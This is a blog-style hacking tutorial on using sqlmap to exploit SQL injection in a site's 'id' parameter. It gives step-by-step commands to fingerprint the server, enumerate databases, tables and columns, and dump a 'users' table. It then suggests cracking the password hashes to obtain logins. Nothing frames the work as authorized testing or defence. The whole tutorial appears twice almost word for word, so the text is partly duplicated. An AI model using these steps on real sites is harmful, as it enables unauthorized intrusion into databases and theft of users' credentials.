SqlMap Tutorial [SQL Injection]
In this TUT i will be showing you how to inject sql vuln site with SQL MAP. In backtrack it is aviliable but for Windows you have to install first Python and then Sqlmap.
SO lets start....
first of all you need to install python as well as sqlmap in your windows.
SO lets start....
first of all you need to install python as well as sqlmap in your windows.
you can download sqlmap from their official webiste
you can downlod python latest version from here
NOTE: the one I'm sharing here is the 2.7.2 version. the latest version is not this probably 3.x versions. but 2.7.2 is the most used version. It can be useful in many cases you face.
Urls:-
Lets say you have a url like this
http://www.site.com/section.php?id=51
and that it is prone to sql injection because the developer of that
site did not properly escape the parameter id. This can be simply tested
by trying to open the url
http://www.site.com/section.php?id=51'We just added a single quote in the parameter. If this url throws an
error then it is clear that the database has reacted with an error
because it got an unexpected single quote.
Hacking with sqlmap :-
Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.
python sqlmap.py -u "http://www.site.com/section.php?id=51"The above is the first and most simple command to run with the sqlmap
tool. It will check the url and try to discover basic information about
the system. The output can look something like this
![[Image: mJWSPMs.png]](http://i.imgur.com/mJWSPMs.png)
So the sqlmap tool has discovered the Operating system, web server
and database along with version information. Even this much is pretty
impressive. But its time to move on and see what more is this tool
capable of.
Discover Databases
In this step sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple
sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
The output could be something like this
![[Image: 1SDKdZG.png]](http://i.imgur.com/1SDKdZG.png)
This time the output contains the available databases list. Move on...
Find tables in the database :-
Now its time to find out what tables exist in a particular database.
Lets say the database of interest over here is 'safecosmetics'
Command
sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output can be something similar to this
![[Image: 86830049d78c46ed8d616f6.png]](http://img547.imageshack.us/img547/6532/86830049d78c46ed8d616f6.png)
isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.
Get columns of a table :-
Now that we have the list of tables with us, it would be a good idea
to get the columns of some important table. Lets say the table is
'users' and it contains the username and password.
sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
So now the columns are clearly visible. Good job!
Get data of the table :-
Now comes the most interesting part, of extracting the data from the table. The command would be
sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The hash column seems to have the password hash. Try cracking the hash
and then you would get the login details rightaway. sqlmap will create a
csv file containing the dump data for easy analysis.
And This is a very cool method i mostly use it to Inject sql vuln site
Lets say you have a url like this
http://www.site.com/section.php?id=51
and that it is prone to sql injection because the developer of that
site did not properly escape the parameter id. This can be simply tested
by trying to open the url
http://www.site.com/section.php?id=51'We just added a single quote in the parameter. If this url throws an
error then it is clear that the database has reacted with an error
because it got an unexpected single quote.
Hacking with sqlmap :-
Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.
python sqlmap.py -u "http://www.site.com/section.php?id=51"The above is the first and most simple command to run with the sqlmap
tool. It will check the url and try to discover basic information about
the system. The output can look something like this
So the sqlmap tool has discovered the Operating system, web server
and database along with version information. Even this much is pretty
impressive. But its time to move on and see what more is this tool
capable of.
Discover Databases
In this step sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple
sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs
The output could be something like this
This time the output contains the available databases list. Move on...
Find tables in the database :-
Now its time to find out what tables exist in a particular database.
Lets say the database of interest over here is 'safecosmetics'
Command
sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output can be something similar to this
isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.
Get columns of a table :-
Now that we have the list of tables with us, it would be a good idea
to get the columns of some important table. Lets say the table is
'users' and it contains the username and password.
sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
So now the columns are clearly visible. Good job!
Get data of the table :-
Now comes the most interesting part, of extracting the data from the table. The command would be
sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The hash column seems to have the password hash. Try cracking the hash
and then you would get the login details rightaway. sqlmap will create a
csv file containing the dump data for easy analysis.
And This is a very cool method i mostly use it to Inject sql vuln site
Labels: Hacking Tutorials, HOW TO, SQL Injectin, SQLMAP Tutorial
posted by Anuran Barman @ 10:04 PM
0 Comments
0 Comments:
Post a Comment
Subscribe to Post Comments [Atom]
<< Home